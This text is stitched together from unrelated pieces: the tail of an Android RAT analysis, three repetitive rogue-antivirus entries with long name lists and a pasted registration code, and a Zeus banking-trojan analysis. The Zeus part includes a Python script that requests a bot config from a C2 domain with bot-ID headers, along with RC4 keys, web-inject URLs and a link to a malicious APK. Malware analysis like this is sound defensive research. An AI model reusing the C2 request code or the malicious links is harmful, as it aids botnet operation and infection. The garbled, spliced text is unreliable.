The takeScreenshot method sends a string of the form ‘/data/local/tmp/images/screenshot_DATE.png’ to the underlying native service. The native service checks for the string after the last trailing slash “/”, “screenshot” after the last trailing slash will cause the native service to take a screenshot by issuing the “screencap –p” method. The screenshot taken will be written to the path specified by the string passed as an argument.

The takeScreenshot method then returns the path of the image to the screenCaptureThread which calls the FTPService thereby uploading the screenshot to the attackers CnC server.

Component 2 - GlobalNativeService

The native services listens on a local socket for commands from the GlobalService.apk.

As seen above, if the string after the last trailing slash is “screenshot_” is sent to the Native service through the socket. It runs the command “screencap –p” on the shell of the device and captures a screenshot of the infected device.

The native service also implements other functionality such as deleting a file, saving FTP information to /data/local/tmp/ftpInformation.

If the string “GPSLocationInfo” is sent to the native service on the local socket, it creates GPSLocations.txt at /data/local/tmp/GPSLocations.txt but does not save the current GPS location. This perhaps indicates an upcoming feature.

Android Remote Controller

Component 1 - GPSTracker.apk 

The startup routine for the GPSTracker class is exactly the same as the one for GlobalService class. It gets the value from an "StartGPSTracker" intent which holds the value for an 'interval' variable as an integer. This app records the GPS location of the device at regular intervals (5 minutes). It records the location only if the previous location is 200 meters apart from the current location.

When a location has to be added to the database all previous locations are deleted. Therefore it only maintains the last known location.

This app monitors all incoming messages. If an SMS with "[gmyl]"(Short for (g)ive (m)e (y)our (l)ocation) at the beginning arrives on the device, the corresponding SMS_RECEIVED intent is aborted and the database is queried. A response SMS is crafted as shown below:

"[himl]<>DATE><LATITUDE##LONGTITUDE"

The string “himl” is short for (h)ere (i)s (m)y (l)ocation. Only the last known location is sent as a response to the user.

Component 2 - GPSTrackerClient.apk

This app acts as the controller to the GPSTracker.apk. While the GPSTracker.apk is installed on the victim's device, the GPSTrackerClient.apk is installed on the device from which the monitoring takes place. It takes the phone number of the phone to be tracked and sends it an SMS that contains "[gmyl]". The GPSTracker.apk then responds with the location in an SMS message as described in the above section. It then uses the native maps functionality, i.e., Google Maps, to point to the location sent by GPSTracker.

It is also worthwhile to note that the two modules do not authenticate each other by any means therefore it allows anyone infected with GPSTracker.apk to be controlled just by sending SMS messages with a given structure.

Conclusion

These attacks and tools reaffirm that we live in an age of digital surveillance and intellectual property theft. Off-the-shelf RATs have continued to proliferate over the years and attackers have continued to increasingly use these tools. With the widespread adoption of mobile platforms such as Android, a new market continues to emerge with the demand for RATs to support these platforms. We will continue to see more implementations of RATs and payloads to support multiple platforms and attackers will continue to take advantage of these new attack surfaces to infiltrate their targets.

Windows Security Master

Windows Security Master is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Windows Defence Unit

Windows Defence Unit is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Windows Protection Booster

Windows Protection Booster is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Zeus 1.1.3.4

RSA FirstWatch throw me recently a sample of a 'new' Zeus variant.
I didn't really check all the changes that were made but seem it's nothing more than just a standard Zeus v2.
But wait, it communicates over SSL and had a new kind of HTTP request pattern:

Fiddler:

Config download in python:
import urllib2

request = urllib2.Request('https://secureinformat.com/?ajax')
request.add_header('Accept', '*/*')
request.add_header('X_ID', '14E255CE7875768FBC303C10')
request.add_header('X_OS', '510')
request.add_header('X_BV', '1.1.3.4')
request.add_header('Control', 'no-cache')
request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729;')
page = urllib2.urlopen(request).read()
open('ajax', 'w').write(page)

Notice the new headers:
X_ID = Bot ID
X_OS = OS version
X_BV = Variant version

The answer of the server have X_ID as cookie:
<< HTTP/1.1 200 OK
<< Date: Fri, 28 Feb 2014 06:35:34 GMT
<< Server: Apache
<< Set-Cookie: X_ID=14E255CE7875768FBC303C10; expires=Sat, 28-Feb-2015 06:35:34 GMT; path=/
<< Content-Description: File Transfer
<< Content-Disposition: attachment; filename=ajax
<< Content-Transfer-Encoding: binary
<< Expires: 0
<< Cache-Control: must-revalidate, post-check=0, pre-check=0
<< Pragma: public
<< Content-Length: 3685
<< Connection: close
<< Content-Type: application/octet-stream

Sample: bb9fe8c3df598b8b6ea2f2653c38ecd2
Version: 1.1.3.4
RC4: E2 82 3E B3 04 11 15 34 17 64 01 DC 7D B8 A5 35 CB 00 19 AA 81 59 6E 1B 85 7E 44 CA 10 90 40 2A C3 36 20 C5 C2 55 E6 F4 43 67 5B 42 4D 21 98 D4 78 70 1A 6F 72 24 88 B4 0A E7 B9 BC C1 8E 8F 79 86 CC 5F 46 FC A9 1C F0 74 E0 C0 3F 8D DD EC 4C 66 A0 02 97 C6 99 BB 7F 0D A8 3A 27 07 E8 75 80 28 54 93 D3 BD 2C EA 9D F6 0B 45 2E F1 EB A3 0E 9E BA 4B 9F 09 89 56 29 C4 48 23 14 2F DA F5 39 3B 8C CD 2B 37 41 A2 95 0F C9 BE AD F8 D7 DE C8 B5 0C 76 51 DF 5D B2 D6 AC 83 52 08 50 92 E1 B0 9C AE CF E4 ED B1 5E 7C 6A 96 65 26 87 2D 12 8A 9A A4 FF 94 D2 7A C7 47 31 7B EE CE DB 32 B7 06 D1 F2 EF AB AF 3C 18 84 E3 22 61 03 3D D9 9B 05 58 D8 30 F7 F3 B6 62 8B 1E 6C 71 FA 4A 4E 63 60 4F 16 6D 25 FB 53 FD 13 33 D0 E9 73 68 F9 69 A6 38 57 6B 5A 49 1D A1 A7 1F BF 5C D5 E5 91 77 FE
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Point:
http://secureinformat.com/?ajax (static config)

For unpacking the config, here again nothing new, regular Zeus v2.
Once unpacked, we can see that the malware is targeting German banks and Trusteer:
http*://*netbanking.sparkasse.at/hilfe/sicherheit*
https://*banking.berliner-bank.de/trxm*
https://*banking.co.at*
https://*commerzbank.de*
https://*commerzbanking.de*
https://*meine.deutsche-bank.de/trxm/db*
https://*meine.norisbank.de/trxm/noris*
https://banking.postbank.de/rai*
https://banking.sparda.de*
https://finanzportal.fiducia.de*
https://netbanking.sparkasse.at/*
https://netbanking.sparkasse.at/casserver/login*
https://netbanking.sparkasse.at/sPortal/*
https://online-*.unicredit.it/*
https://online.bankaustria.at*
https://*commerzbank.de*
https://*commerzbanking.de*
https://*meine.deutsche-bank.de/trxm/db*
https://*meine.norisbank.de/trxm/noris*
https://www.trusteer.com/ProtectYourMoney*
WebInjects:
https://secure730.com/oz1/service.in?id=50
https://secure730.com/oz1/service.in?id=44
https://secure730.com/oz1/service.in?id=43
https://secure730.com/oz1/service.in?id=41
https://secure730.com/oz1/service.in?id=7
https://secure730.com/oz1/service.in?id=6
https://secure730.com/oz1/service.in?id=4
https://secure730.com/oz1/service.in?id=3
https://secure730.com/oz1/service.in?id=2
https://secure730.com/oz1/service.in?id=1
https://secureinformat.com/id/351
https://secureinformat.com/id/350
https://secureinformat.com/id/51
https://secureinformat.com/id/10

Man in the browser:

Clean browser surfing Trusteer website:

Infected browser surfing Trusteer website:
Requesting the user to download an APK:
Test done on the latest Firefox version (v27.0.1)

bit.ly/1jmQHmA = hxtp://shlyxiest.biz/cdn/Trusteer-Mobile.apk
>> https://www.virustotal.com/en/file/2f82ce7288137c0acbeefd9ef9f63926057871611703e77803b842201009767a/analysis/1393786189/
Phone number:  79670478968

Identified as Perkel.c by Kaspersky, Perkel is an android malware who was sold by Perkele (this guy was later banned from underground forums for scaming but it's another story)

Sort of Fake AV:

Sample: 917df7b6268ba705b192b89a1cf28764
Version: 1.1.3.4
RC4: E2 82 3E B3 04 11 15 34 17 64 01 DC 7D B8 A5 35 CB 00 19 AA 81 59 6E 1B 85 7E 44 CA 10 90 40 2A C3 36 20 C5 C2 55 E6 F4 43 67 5B 42 4D 21 98 D4 78 70 1A 6F 72 24 88 B4 0A E7 B9 BC C1 8E 8F 79 86 CC 5F 46 FC A9 1C F0 74 E0 C0 3F 8D DD EC 4C 66 A0 02 97 C6 99 BB 7F 0D A8 3A 27 07 E8 75 80 28 54 93 D3 BD 2C EA 9D F6 0B 45 2E F1 EB A3 0E 9E BA 4B 9F 09 89 56 29 C4 48 23 14 2F DA F5 39 3B 8C CD 2B 37 41 A2 95 0F C9 BE AD F8 D7 DE C8 B5 0C 76 51 DF 5D B2 D6 AC 83 52 08 50 92 E1 B0 9C AE CF E4 ED B1 5E 7C 6A 96 65 26 87 2D 12 8A 9A A4 FF 94 D2 7A C7 47 31 7B EE CE DB 32 B7 06 D1 F2 EF AB AF 3C 18 84 E3 22 61 03 3D D9 9B 05 58 D8 30 F7 F3 B6 62 8B 1E 6C 71 FA 4A 4E 63 60 4F 16 6D 25 FB 53 FD 13 33 D0 E9 73 68 F9 69 A6 38 57 6B 5A 49 1D A1 A7 1F BF 5C D5 E5 91 77 FE
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Points:
https://koloboktv.com/?ajax (static config)
https://securestakan2.net/?ajax (dynamic config)
https://securemagnit5.net/?ajax (dynamic config)
WebInjects:
https://pikachujp.com/oz1/service.in?id=50
https://pikachujp.com/oz1/service.in?id=44
https://pikachujp.com/oz1/service.in?id=43
https://pikachujp.com/oz1/service.in?id=41
https://pikachujp.com/oz1/service.in?id=7
https://pikachujp.com/oz1/service.in?id=6
https://pikachujp.com/oz1/service.in?id=4
https://pikachujp.com/oz1/service.in?id=3
https://pikachujp.com/oz1/service.in?id=2
https://pikachujp.com/oz1/service.in?id=1
https://koloboktv.com/id/351
https://koloboktv.com/id/350
https://koloboktv.com/id/51
https://koloboktv.com/id/10

Sample: 7fb62987f20b002475cb1499eb86a1f5
Version: 1.1.2.1
RC4: 30 72 E6 32 80 EF BD 92 BE DD 3B 1C 58 45 33 2F 41 53 A9 26 8E 20 4D 8A DB 6A F6 8B CE 4C B6 38 02 2B 6C 15 A1 2C 2D C2 ED 0E BB BF 64 40 F1 9F D2 36 07 C3 CF 8D AA D3 A5 42 C0 9B 48 49 67 81 98 75 51 1B 96 6E 97 4A 59 DE 44 65 85 7B 35 16 0C 23 4F FE 5B FA D7 84 A7 46 EE 82 DF E1 6B AD 94 CB 18 C4 8C 0F E7 00 E0 7E CA 24 1A 7A A6 73 3C 03 F5 9C EA 1E FB D4 0B 14 11 22 06 F4 6D 55 E5 93 F9 E2 69 D5 CD 27 E8 12 C8 77 0D 08 A2 B7 0A 01 D8 EB 3F AB 3A 61 83 04 86 CC FD F3 5F 63 09 AC AF 66 17 B9 56 19 F2 C7 47 43 25 1D 89 29 99 2E C1 87 54 C9 62 34 74 4B A0 B1 3E 21 57 52 2A 39 FF 05 BC C6 A4 4E 3D 9D E3 D9 BA 76 5C AE A3 FC B4 B3 D6 28 5A 68 F7 31 7D 7F E4 1F 37 D1 90 B5 B0 D0 C5 79 DA 13 71 A8 7C EC F8 E9 60 50 88 78 70 10 B2 5E 8F 6F 9A B8 95 DC 9E 91 F0 5D
Update Point:
https://securestatic.com/?ajax (static config)

All these samples use the same IP range:
• dns: 1 ›› ip: 37.228.92.170 - adress: SECURE730.COM
• dns: 1 ›› ip: 37.228.92.169 - adress: SECUREINFORMAT.COM
• dns: 1 ›› ip: 37.228.92.148 - adress: SHLYXIEST.BIZ
• dns: 1 ›› ip: 37.228.92.147 - adress: SECURESTATIC.COM
• dns: 1 ›› ip: 37.228.92.146 - adress: KOLOBOKTV.COM

I've wrote a small yara rule in hope to see more of these.
All configs that i grabbed was reporting to localhost not to a server...